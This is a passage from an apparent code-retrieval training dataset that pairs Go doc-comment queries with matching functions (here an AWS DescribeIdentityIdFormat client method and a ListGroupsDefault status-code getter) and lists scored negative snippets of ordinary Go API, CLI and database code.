r, CoreGroupModuleID, CoreAccessRead)\n if !allow {\n w.WriteHeader(http.StatusUnauthorized)\n json.NewEncoder(w).Encode(&CoreMessage{\n Message: \"Not authorized!\",\n })\n return\n }\n\n groups := []CoreGroup{}\n\n err := Db.Model(&groups).Select()\n if err != nil {\n w.WriteHeader(http.StatusBadRequest)\n return\n }\n\n w.WriteHeader(http.StatusOK)\n json.NewEncoder(w).Encode(groups)\n}", "func NewGroup()(*Group) {\n m := &Group{\n DirectoryObject: *NewDirectoryObject(),\n }\n odataTypeValue := \"#microsoft.graph.group\";\n m.SetOdataType(&odataTypeValue);\n return m\n}", "func (o OAUTHKeysList) DefaultOrder() []string {\n\n\treturn []string{}\n}", "func (s *ServiceOp) List(ctx context.Context, input *ListGroupsInput) (*ListGroupsOutput, error) {\n\tr := client.NewRequest(http.MethodGet, \"/compute/azure/group\")\n\tresp, err := client.RequireOK(s.Client.Do(ctx, r))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer resp.Body.Close()\n\n\tgs, err := groupsFromHttpResponse(resp)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &ListGroupsOutput{Groups: gs}, nil\n}", "func (c *MockResourceGroupsClient) List(ctx context.Context, filter string) ([]resources.Group, error) {\n\tif filter != \"\" {\n\t\treturn nil, fmt.Errorf(\"unsupported non-empty filter: %s\", filter)\n\t}\n\tvar l []resources.Group\n\tfor _, rg := range c.RGs {\n\t\tl = append(l, rg)\n\t}\n\treturn l, nil\n}", "func (o SparseImageVulnerabilitiesList) DefaultOrder() []string {\n\n\treturn []string{}\n}", "func (s *ServiceOp) List(ctx context.Context, input *ListGroupsInput) (*ListGroupsOutput, error) {\n\tr := client.NewRequest(http.MethodGet, \"/azure/compute/group\")\n\tresp, err := client.RequireOK(s.Client.Do(ctx, r))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer resp.Body.Close()\n\n\tgs, err := groupsFromHttpResponse(resp)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &ListGroupsOutput{Groups: gs}, nil\n}", "func (o SparsePCSearchResultsList) DefaultOrder() []string {\n\n\treturn []string{}\n}", "func listGroups(cmd *cobra.Command, args []string) error {\n\tclient, err := getClient()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn nil\n\t}\n\tdefer client.Close()\n\n\tvar matchingGroups map[string]bool\n\tif len(args) != 0 {\n\t\t// Mark all groups mentioned on the command line\n\t\tmatchingGroups = make(map[string]bool, len(args))\n\t\tfor _, g := range args {\n\t\t\tmatchingGroups[g] = true\n\t\t}\n\t}\n\t// Get list of all groups and their roles\n\t_, roleGroups, err := getRoles(cmd, nil, true, client)\n\tif err != nil {\n\t\tfmt.Println(toAPIError(err))\n\t\treturn nil\n\t}\n\n\tgroupMap := make(groupMap)\n\tfor roleName, groups := range roleGroups {\n\t\tfor _, group := range groups {\n\t\t\tif matchingGroups != nil && !matchingGroups[group] {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tgroupMap[group] = append(groupMap[group], roleName)\n\t\t}\n\t}\n\n\t// Get sorted list of groups\n\tgroups := make([]string, 0, len(groupMap))\n\tfor group := range groupMap {\n\t\tgroups = append(groups, group)\n\t}\n\tsort.Strings(groups)\n\n\t// Display all groups\n\tverbose := viper.GetBool(verboseOpt)\n\tfor _, group := range groups {\n\t\tif verbose {\n\t\t\tfmt.Println(group, \"=\", strings.Join(groupMap[group], \", \"))\n\t\t} else {\n\t\t\tfmt.Println(group)\n\t\t}\n\t}\n\n\treturn nil\n}", "func (o SparseSSHAuthorizationPoliciesList) DefaultOrder() []string {\n\n\treturn []string{\n\t\t\"name\",\n\t}\n}", "func NewListClusterPatchPatchesDefault(code int) *ListClusterPatchPatchesDefault {\n\treturn &ListClusterPatchPatchesDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (o PCSearchResultsList) DefaultOrder() []string {\n\n\treturn []string{}\n}", "func NewListGroupsForbidden() *ListGroupsForbidden {\n\treturn &ListGroupsForbidden{}\n}", "func NewGetNetworkGroupnetDefault(code int) *GetNetworkGroupnetDefault {\n\treturn &GetNetworkGroupnetDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (o *UsersGroupsBulkDeleteParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o SparseSSHAuthoritiesList) DefaultOrder() []string {\n\n\treturn []string{\n\t\t\"name\",\n\t}\n}", "func (db *MySQLDB) ListGroups(ctx context.Context, tenant *Tenant, request *helper.PageRequest) ([]*Group, *helper.Page, error) {\n\tfLog := mysqlLog.WithField(\"func\", \"ListGroups\").WithField(\"RequestID\", ctx.Value(constants.RequestID))\n\tq := \"SELECT COUNT(*) AS CNT FROM HANSIP_GROUP\"\n\tret := make([]*Group, 0)\n\trow := db.instance.QueryRowContext(ctx, q)\n\tcount := 0\n\terr := row.Scan(&count)\n\tif err != nil {\n\t\tif err == sql.ErrNoRows {\n\t\t\treturn ret, helper.NewPage(request, uint(count)), nil\n\t\t}\n\t\tfLog.Errorf(\"row.Scan got %s\", err.Error())\n\t\treturn nil, nil, &ErrDBScanError{\n\t\t\tWrapped: err,\n\t\t\tMessage: \"Error ListGroups\",\n\t\t\tSQL: q,\n\t\t}\n\t}\n\tpage := helper.NewPage(request, uint(count))\n\tq = fmt.Sprintf(\"SELECT REC_ID, GROUP_NAME, GROUP_DOMAIN, DESCRIPTION FROM HANSIP_GROUP WHERE GROUP_DOMAIN=? ORDER BY GROUP_NAME %s LIMIT %d, %d\", request.Sort, page.OffsetStart, page.OffsetEnd-page.OffsetStart)\n\trows, err := db.instance.QueryContext(ctx, q, tenant.Domain)\n\tif err != nil {\n\t\tfLog.Errorf(\"db.instance.QueryContext got %s. SQL = %s\", err.Error(), q)\n\t\treturn nil, nil, &ErrDBQueryError{\n\t\t\tWrapped: err,\n\t\t\tMessage: \"Error ListGroups\",\n\t\t\tSQL: q,\n\t\t}\n\t}\n\tdefer rows.Close()\n\tfor rows.Next() {\n\t\tr := &Group{}\n\t\terr := rows.Scan(&r.RecID, &r.GroupName, &r.GroupDomain, &r.Description)\n\t\tif err != nil {\n\t\t\tfLog.Warnf(\"row.Scan got %s\", err.Error())\n\t\t\treturn nil, nil, &ErrDBScanError{\n\t\t\t\tWrapped: err,\n\t\t\t\tMessage: \"Error ListGroups\",\n\t\t\t\tSQL: q,\n\t\t\t}\n\t\t} else {\n\t\t\tret = append(ret, r)\n\t\t}\n\t}\n\treturn ret, page, nil\n}", "func NewListNSGroupsParamsWithTimeout(timeout time.Duration) *ListNSGroupsParams {\n\tvar (\n\t\tpageSizeDefault = int64(1000)\n\t\tpopulateReferencesDefault = bool(false)\n\t)\n\treturn &ListNSGroupsParams{\n\t\tPageSize: &pageSizeDefault,\n\t\tPopulateReferences: &populateReferencesDefault,\n\n\t\ttimeout: timeout,\n\t}\n}", "func NewPostHostsListDefault(code int) *PostHostsListDefault {\n\treturn &PostHostsListDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewListVnicAttachmentsDefault(code int) *ListVnicAttachmentsDefault {\n\treturn &ListVnicAttachmentsDefault{\n\t\t_statusCode: code,\n\t}\n}" ]
[ "0.6909627", "0.6855606", "0.6750744", "0.67320436", "0.6511958", "0.6096127", "0.6058161", "0.6057901", "0.6002544", "0.5979988", "0.5939993", "0.5933852", "0.58916205", "0.5888019", "0.58734596", "0.5857483", "0.5743509", "0.5674591", "0.5649271", "0.562719", "0.56152534", "0.5582357", "0.5558763", "0.5500531", "0.54939806", "0.54578555", "0.5412796", "0.5402376", "0.5393324", "0.5376026", "0.5367704", "0.53667563", "0.53346044", "0.5321065", "0.53123814", "0.53088343", "0.5307141", "0.5296614", "0.52961844", "0.5294298", "0.5283816", "0.5268576", "0.5263733", "0.52634716", "0.5258482", "0.52535814", "0.52493584", "0.52491146", "0.52344596", "0.52335954", "0.52287567", "0.52234656", "0.5216773", "0.5215906", "0.5213223", "0.5205109", "0.52024275", "0.5198184", "0.51920694", "0.5191568", "0.51911163", "0.51877195", "0.51876324", "0.51708627", "0.5170292", "0.51694405", "0.51682943", "0.51675", "0.5163441", "0.51201624", "0.5118188", "0.5107403", "0.5104304", "0.50969446", "0.5092661", "0.5085538", "0.5083975", "0.50797063", "0.5078683", "0.5073951", "0.50697535", "0.5069415", "0.5066587", "0.50642097", "0.5059564", "0.50517535", "0.5050455", "0.5046771", "0.5038782", "0.50372726", "0.5030838", "0.5030085", "0.5016002", "0.5015481", "0.5004053", "0.50006694", "0.4992403", "0.4985935", "0.4985809", "0.49847472" ]
0.77026397
0
Code gets the status code for the list groups default response
func (o *ListGroupsDefault) Code() int { return o._statusCode }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *PostVolumeGroupsListDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetHostGroupsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *QueryCIDGroupsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListServerGroupOK) Code() int {\n\treturn 200\n}", "func (o *QueryUserGroupsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ResonateUserListUsersUserGroupsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *DeleteCIDGroupsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *DeleteAuthGroupsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *UpdateHostGroupsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *DeleteUserGroupsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *DeleteIamLdapGroupsMoidDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListIdpGroupMappingsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *UpdateUserGroupsOK) Code() int {\n\treturn 200\n}", "func (o *GetUserGroupMembersByIDDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetCustomObjectDefinitionsByIDAttributeGroupsByIDDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetNetworkGroupnetDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetSystemObjectDefinitionsByIDAttributeGroupsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *TenancyContactGroupsCreateDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *UpdateDashboardGroupByIDDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *QueryGroupMembersOK) Code() int {\n\treturn 200\n}", "func (o *S3GroupGetDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListGroupnetSubnetsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListServerGroupBadRequest) Code() int {\n\treturn 400\n}", "func (o *DeleteRuleGroupsMixin0Default) Code() int {\n\treturn o._statusCode\n}", "func (o *DeleteMsgVpnAuthorizationGroupDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *S3GroupDeleteDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *DeleteNetworksNetworkIDRatingGroupsRatingGroupIDDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *PostVolumeGroupBackupsListDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *PatchReportGroupByIDDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListDashboardsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *NetgroupsSettingsCollectionGetDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListServerGroupInternalServerError) Code() int {\n\treturn 500\n}", "func (o *GetSitesByIDCustomerGroupsByIDMembersByIDDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *PostContainersListDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *QueryCIDGroupMembersOK) Code() int {\n\treturn 200\n}", "func (o *UpdateUserGroupsMultiStatus) Code() int {\n\treturn 207\n}", "func (o *PatchRecipientGroupByIDDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *AddServerGroupNotFound) Code() int {\n\treturn 404\n}", "func (o *GetSecurityGroupOK) Code() int {\n\treturn 200\n}", "func (o *AddServerGroupNoContent) Code() int {\n\treturn 204\n}", "func (o *UpdateRecipientGroupByIDDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *RemoveServerGroupNotFound) Code() int {\n\treturn 404\n}", "func (o *PatchDeviceGroupPropertyByNameDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *CreateSecurityListDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListOrganizationMemberNamesDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListRolesDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListServerGroupConflict) Code() int {\n\treturn 409\n}", "func (o *ListServerGroupOK) IsCode(code int) bool {\n\treturn code == 200\n}", "func (o *PostOauthClientListDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *RemoveServerGroupNoContent) Code() int {\n\treturn 204\n}", "func (o *PostSitesByIDCustomerGroupsByIDMemberSearchDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *UpdateUserGroupsBadRequest) Code() int {\n\treturn 400\n}", "func (o *LocalCifsGroupMembersBulkDeleteDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetLeaderboardDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *PutProductsByIDVariationGroupsByIDDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *QueryCombinedDeviceControlPolicyMembersDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListVnicAttachmentsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *LoginMessagesCollectionGetDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetManagementControllersMoidDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *LdapGetDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *FindVmsByFiltersDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *DeleteCategoriesNameValueDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *PcloudVolumegroupsGetOK) IsCode(code int) bool {\n\treturn code == 200\n}", "func (o *RemoveServerGroupBadRequest) Code() int {\n\treturn 400\n}", "func (o *GetOrganizationsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *UpdateUserGroupsForbidden) Code() int {\n\treturn 403\n}", "func (o *PostHostsListDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListAWSZonesNoCredentialsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ProjectGetContainerRegistriesDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListDashboardsOK) Code() int {\n\treturn 200\n}", "func (o *AddServerGroupBadRequest) Code() int {\n\treturn 400\n}", "func (o *ListGCPNetworksNoCredentialsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetServerConfigImportsMoidDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetSearchSearchItemsMoidDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *AddAPIDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *QueryGroupMembersInternalServerError) Code() int {\n\treturn 500\n}", "func (o *GetCondHclStatusesDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListClusterRoleDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *DeleteIamLdapProvidersMoidDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetSearchTagItemsMoidDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetAvailabilityZonesUUIDDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *RemoveServerGroupInternalServerError) Code() int {\n\treturn 500\n}", "func (o *PostHclCompatibilityStatusesDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *QueryGroupMembersNotFound) Code() int {\n\treturn 404\n}", "func (o *PostClustersMulticlusterConfigDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListFirewallsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *BackendModuleServiceV1GetModulesGetDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListSyncJobsDefault) Code() int {\n\treturn o._statusCode\n}", "func (s *SecurityGroupLimitExceeded) StatusCode() int {\n\treturn s.RespMetadata.StatusCode\n}", "func (o *GetNetworkPoolsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetNiaapiApicSweolsMoidDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetNodesDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *CreateSettingsReportingEulaItemDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListSiteFilesDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListCloudJobsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListProviderPresetsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *AddServerGroupInternalServerError) Code() int {\n\treturn 500\n}", "func (o *GetPassesDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *ListComponentVersionsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetModelRegistryDefault) Code() int {\n\treturn o._statusCode\n}" ]
[ "0.8499957", "0.84434056", "0.8435817", "0.8416033", "0.8345299", "0.8230771", "0.8145179", "0.80832684", "0.79981744", "0.79788136", "0.7896459", "0.7836262", "0.7748716", "0.7699286", "0.7659471", "0.7655369", "0.76534915", "0.7602137", "0.7558863", "0.75421864", "0.7498871", "0.7498372", "0.7490497", "0.7426853", "0.73809016", "0.7366736", "0.73510975", "0.7340894", "0.73315006", "0.732588", "0.73006034", "0.7298013", "0.7295274", "0.72597003", "0.72462624", "0.7246078", "0.7245233", "0.7235873", "0.72346455", "0.7198633", "0.7194821", "0.7151231", "0.71368015", "0.7130802", "0.71047944", "0.7042134", "0.70282346", "0.7026574", "0.7010944", "0.70050186", "0.6962129", "0.6958888", "0.69576705", "0.6945851", "0.69334054", "0.69128287", "0.69123715", "0.6911115", "0.6909678", "0.6908535", "0.6897717", "0.68935937", "0.68880945", "0.6885164", "0.68781173", "0.6867512", "0.6858455", "0.68492544", "0.6847801", "0.68466127", "0.68357104", "0.6831532", "0.6824546", "0.6823494", "0.68224484", "0.68184966", "0.6805688", "0.6803432", "0.67977536", "0.67891854", "0.6788822", "0.6788009", "0.67824185", "0.6781209", "0.678032", "0.6777828", "0.6768513", "0.6767991", "0.6756146", "0.67540103", "0.6753646", "0.675157", "0.67390007", "0.6738618", "0.6729516", "0.67282474", "0.67247933", "0.6714722", "0.67141956", "0.6711939" ]
0.8957152
0
Describes the ID format settings for resources for the specified IAM user, IAM role, or root user. For example, you can view the resource types that are enabled for longer IDs. This request only returns information about resource types whose ID formats can be modified; it does not return information about other resource types. For more information, see Resource IDs ( in the Amazon Elastic Compute Cloud User Guide. The following resource types support longer IDs: bundle | conversiontask | customergateway | dhcpoptions | elasticipallocation | elasticipassociation | exporttask | flowlog | image | importtask | instance | internetgateway | networkacl | networkaclassociation | networkinterface | networkinterfaceattachment | prefixlist | reservation | routetable | routetableassociation | securitygroup | snapshot | subnet | subnetcidrblockassociation | volume | vpc | vpccidrblockassociation | vpcendpoint | vpcpeeringconnection | vpnconnection | vpngateway . These settings apply to the principal specified in the request. They do not apply to the principal that makes the request.
func (c *Client) DescribeIdentityIdFormat(ctx context.Context, params *DescribeIdentityIdFormatInput, optFns ...func(*Options)) (*DescribeIdentityIdFormatOutput, error) { if params == nil { params = &DescribeIdentityIdFormatInput{} } result, metadata, err := c.invokeOperation(ctx, "DescribeIdentityIdFormat", params, optFns, c.addOperationDescribeIdentityIdFormatMiddlewares) if err != nil { return nil, err } out := result.(*DescribeIdentityIdFormatOutput) out.ResultMetadata = metadata return out, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func permissionsResourceIDFields() []permissionsIDFieldMapping {\n\tSIMPLE := func(client *service.DBApiClient, id string) (string, error) {\n\t\treturn id, nil\n\t}\n\tPATH := func(client *service.DBApiClient, path string) (string, error) {\n\t\tinfo, err := client.Notebooks().Read(path)\n\t\tif err != nil {\n\t\t\treturn \"\", errors.Wrapf(err, \"Cannot load path %s\", path)\n\t\t}\n\t\treturn strconv.FormatInt(info.ObjectID, 10), nil\n\t}\n\treturn []permissionsIDFieldMapping{\n\t\t{\"cluster_policy_id\", \"cluster-policy\", \"cluster-policies\", SIMPLE},\n\t\t{\"instance_pool_id\", \"instance-pool\", \"instance-pools\", SIMPLE},\n\t\t{\"cluster_id\", \"cluster\", \"clusters\", SIMPLE},\n\t\t{\"job_id\", \"job\", \"jobs\", SIMPLE},\n\t\t{\"notebook_id\", \"notebook\", \"notebooks\", SIMPLE},\n\t\t{\"notebook_path\", \"notebook\", \"notebooks\", PATH},\n\t\t{\"directory_id\", \"directory\", \"directories\", SIMPLE},\n\t\t{\"directory_path\", \"directory\", \"directories\", PATH},\n\t}\n}", "func (*User_ID) Descriptor() ([]byte, []int) {\n\treturn file_ocis_messages_policies_v0_policies_proto_rawDescGZIP(), []int{0, 0}\n}", "func (r Schema) Format() ([]string, []interface{}) {\n\ts := make([]interface{}, 1)\n\ts[0] = r\n\n\treturn []string{\"ID\", \"Type\", \"Language\"}, s\n}", "func (*UserGrantID) Descriptor() ([]byte, []int) {\n\treturn file_management_proto_rawDescGZIP(), []int{130}\n}", "func (*UserGrantID) Descriptor() ([]byte, []int) {\n\treturn file_management_proto_rawDescGZIP(), []int{129}\n}", "func SupportIds(settings *models.Settings) {\n\thelpers.SignIn(settings)\n\tfmt.Printf(`EnvironmentID: %s\nUsersID: %s\nServiceID: %s\n`, settings.EnvironmentID, settings.UsersID, settings.ServiceID)\n}", "func (e *EmailID) FormatIDs() {\n\te.IDStr = EncodeUUIDBase64(e.ID)\n}", "func (u UserResult) Format() (all [][]string) {\n\tfor _, v := range u.data {\n\t\tvar row []string\n\n\t\trow = append(row,\n\t\t\tstrconv.Itoa(v.ID),\n\t\t\tv.Name,\n\t\t\tv.Alias,\n\t\t\tstrconv.FormatBool(v.Active),\n\t\t\tstrconv.FormatBool(v.Verified),\n\t\t\tstrconv.FormatBool(v.Shared),\n\t\t\tv.Locale,\n\t\t\tv.Timezone,\n\t\t\tv.Email,\n\t\t\tv.Phone,\n\t\t\tv.Signature,\n\t\t\tstrconv.Itoa(v.OrganizationID),\n\t\t\tstrings.Join(v.Tags, \",\\n\"),\n\t\t\tstrconv.FormatBool(v.Suspended),\n\t\t\tv.Role,\n\t\t)\n\t\tall = append(all, row)\n\t}\n\treturn all\n}", "func (*AccountSetContentSettingsRequest) TypeID() uint32 {\n\treturn AccountSetContentSettingsRequestTypeID\n}", "func ResourceIdType_Values() []string {\n\treturn []string{\n\t\tResourceIdTypeLongId,\n\t\tResourceIdTypeShortId,\n\t}\n}", "func (*ProjectUserGrantID) Descriptor() ([]byte, []int) {\n\treturn file_management_proto_rawDescGZIP(), []int{130}\n}", "func (*UsersGetStoriesMaxIDsRequest) TypeID() uint32 {\n\treturn UsersGetStoriesMaxIDsRequestTypeID\n}", "func (*GetInfoByUserIdRequest) Descriptor() ([]byte, []int) {\n\treturn file_proto_user_user_proto_rawDescGZIP(), []int{4}\n}", "func (*ProjectGrantUserGrantID) Descriptor() ([]byte, []int) {\n\treturn file_management_proto_rawDescGZIP(), []int{132}\n}", "func resourceDetails(cfg api.Config, context string) error {\n\tcs, err := csForContext(cfg, context)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"Can't create a clientset based on config provided\")\n\t}\n\t_, reslist, err := cs.Discovery().ServerGroupsAndResources()\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"Can't get cluster server version\")\n\t}\n\tfmt.Println(\"Resources supported in this cluster:\")\n\tfor _, res := range reslist {\n\t\tfmt.Println(strings.Repeat(\"-\", 80))\n\t\tfmt.Printf(\"%v:\\n \", res.GroupVersion)\n\t\tfor _, r := range res.APIResources {\n\t\t\tif !strings.Contains(r.Name, \"/\") {\n\t\t\t\tfmt.Printf(\"%v (namespaced: %v) \", r.Name, r.Namespaced)\n\t\t\t}\n\t\t}\n\t\tfmt.Printf(\"\\n\")\n\t}\n\tfmt.Println(strings.Repeat(\"*\", 80))\n\treturn nil\n}", "func (*GetInfoByUserIdResponse) Descriptor() ([]byte, []int) {\n\treturn file_proto_user_user_proto_rawDescGZIP(), []int{5}\n}", "func (o *CredentialProviderAPI) Formats() strfmt.Registry {\n\treturn o.formats\n}", "func (*UserID) Descriptor() ([]byte, []int) {\n\treturn file_management_proto_rawDescGZIP(), []int{7}\n}", "func (*UserID) Descriptor() ([]byte, []int) {\n\treturn file_management_proto_rawDescGZIP(), []int{7}\n}", "func (*UserId) Descriptor() ([]byte, []int) {\n\treturn file_user_user_proto_rawDescGZIP(), []int{0}\n}", "func (*GetUserByIDRequest) Descriptor() ([]byte, []int) {\n\treturn file_user_proto_rawDescGZIP(), []int{1}\n}", "func (*UsersGetFullUserRequest) TypeID() uint32 {\n\treturn UsersGetFullUserRequestTypeID\n}", "func (*UsersSetSecureValueErrorsRequest) TypeID() uint32 {\n\treturn UsersSetSecureValueErrorsRequestTypeID\n}", "func UserSettingsHandler(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tvar userSettings UserSettings\n\tkeys, ok := r.URL.Query()[\"userId\"]\n\n\tif !ok || len(keys[0]) < 1 {\n\t\tres.Error = \"Invalid request: no user id found\"\n\t\tjson.NewEncoder(w).Encode(res)\n\t\treturn\n\t}\n\n\tvar resultUser UserSettings\n\tvar res ResponseResult\n\n\tvar err = sqldb.globalDB.Where(\"userId = ?\", keys[0]).First(&userSettings)\n\n\tif err != nil {\n\t\t// TODO: handle error\n\t}\n}", "func (*GetUserByIDResponse) Descriptor() ([]byte, []int) {\n\treturn file_user_proto_rawDescGZIP(), []int{2}\n}", "func (*GetPatrolListByUserIDRequest) Descriptor() ([]byte, []int) {\n\treturn file_patrol_proto_rawDescGZIP(), []int{4}\n}", "func (o *CloudTidesAPI) Formats() strfmt.Registry {\n\treturn o.formats\n}", "func (r APIVersion) Format() ([]string, []interface{}) {\n\ts := make([]interface{}, 1)\n\ts[0] = r\n\n\treturn []string{\"ID\", \"Name\"}, s\n}", "func (*SamlUserAccount) Descriptor() ([]byte, []int) {\n\treturn file_yandex_cloud_iam_v1_user_account_proto_rawDescGZIP(), []int{2}\n}", "func (*GetPatrolListByUserIDResponse) Descriptor() ([]byte, []int) {\n\treturn file_patrol_proto_rawDescGZIP(), []int{5}\n}", "func (*UserIDRequest) Descriptor() ([]byte, []int) {\n\treturn file_mitraintegrasi_proto_rawDescGZIP(), []int{5}\n}", "func (o GetAuthorizersResultOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v GetAuthorizersResult) string { return v.Id }).(pulumi.StringOutput)\n}", "func (*SetUserSupportInfoRequest) TypeID() uint32 {\n\treturn SetUserSupportInfoRequestTypeID\n}", "func (*UserRoleAssignment) Descriptor() ([]byte, []int) {\n\treturn file_ocis_messages_settings_v0_settings_proto_rawDescGZIP(), []int{2}\n}", "func (*RoleAttributes) Descriptor() ([]byte, []int) {\n\treturn file_protodef_user_user_proto_rawDescGZIP(), []int{13}\n}", "func (*HttpConnectionManagerSettings_UuidRequestIdConfigSettings) Descriptor() ([]byte, []int) {\n\treturn file_github_com_solo_io_gloo_projects_gloo_api_v1_options_hcm_hcm_proto_rawDescGZIP(), []int{0, 1}\n}", "func FormatDomainIDInts(rs []DomainEntryIDInt, format string) string {\n\tres := \"\"\n\tswitch format {\n\tcase \"json\":\n\t\tbs, _ := json.Marshal(rs)\n\t\tres = string(bs)\n\tdefault:\n\t\tb := new(bytes.Buffer)\n\t\ttable := tablewriter.NewWriter(b)\n\t\tdummy := DomainEntryIDInt{}\n\t\theader := structs.StructKeys(dummy, true)\n\t\ttable.SetHeader(header)\n\t\tfor _, r := range rs {\n\t\t\ttable.Append(structs.StructValues(r, true))\n\t\t}\n\t\tif len(header) > 2 {\n\t\t\ttotal := make([]string, len(header))\n\t\t\ttotal[len(total)-1] = strconv.Itoa(len(rs))\n\t\t\ttotal[len(total)-2] = \"TOTAL\"\n\t\t\ttable.SetFooter(total)\n\t\t}\n\t\ttable.Render()\n\t\tres = b.String()\n\t}\n\treturn res\n}", "func (*GetInfoByUniqueIdRequest) Descriptor() ([]byte, []int) {\n\treturn file_proto_user_user_proto_rawDescGZIP(), []int{2}\n}", "func (*CreateOrganizationRequest_User) Descriptor() ([]byte, []int) {\n\treturn file_toit_api_auth_proto_rawDescGZIP(), []int{6, 1}\n}", "func (uuid UUID) Format(flags FmtFlags) string {\n\tvar fmtbytes []byte\n\tvar offs = 0\n\tif flags&WithBraces == WithBraces {\n\t\tfmtbytes = make([]byte, 38)\n\t\tfmtbytes[0] = '{'\n\t\tfmtbytes[37] = '}'\n\t\toffs = 1\n\t} else {\n\t\tfmtbytes = make([]byte, 36)\n\t}\n\n\tupper := flags&UpperCase == UpperCase\n\ttohex(fmtbytes[offs+0:offs+8], uuid[0:4], upper)\n\tfmtbytes[offs+8] = '-'\n\ttohex(fmtbytes[offs+9:offs+13], uuid[4:6], upper)\n\tfmtbytes[offs+13] = '-'\n\ttohex(fmtbytes[offs+14:offs+18], uuid[6:8], upper)\n\tfmtbytes[offs+18] = '-'\n\ttohex(fmtbytes[offs+19:offs+23], uuid[8:10], upper)\n\tfmtbytes[offs+23] = '-'\n\ttohex(fmtbytes[offs+24:], uuid[10:], upper)\n\n\treturn string(fmtbytes)\n}", "func (*GetListByUserIdResponse) Descriptor() ([]byte, []int) {\n\treturn file_proto_user_user_proto_rawDescGZIP(), []int{7}\n}", "func (o ResourcePolicyExemptionOutput) ResourceId() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *ResourcePolicyExemption) pulumi.StringOutput { return v.ResourceId }).(pulumi.StringOutput)\n}", "func (*GetListByUserIdRequest) Descriptor() ([]byte, []int) {\n\treturn file_proto_user_user_proto_rawDescGZIP(), 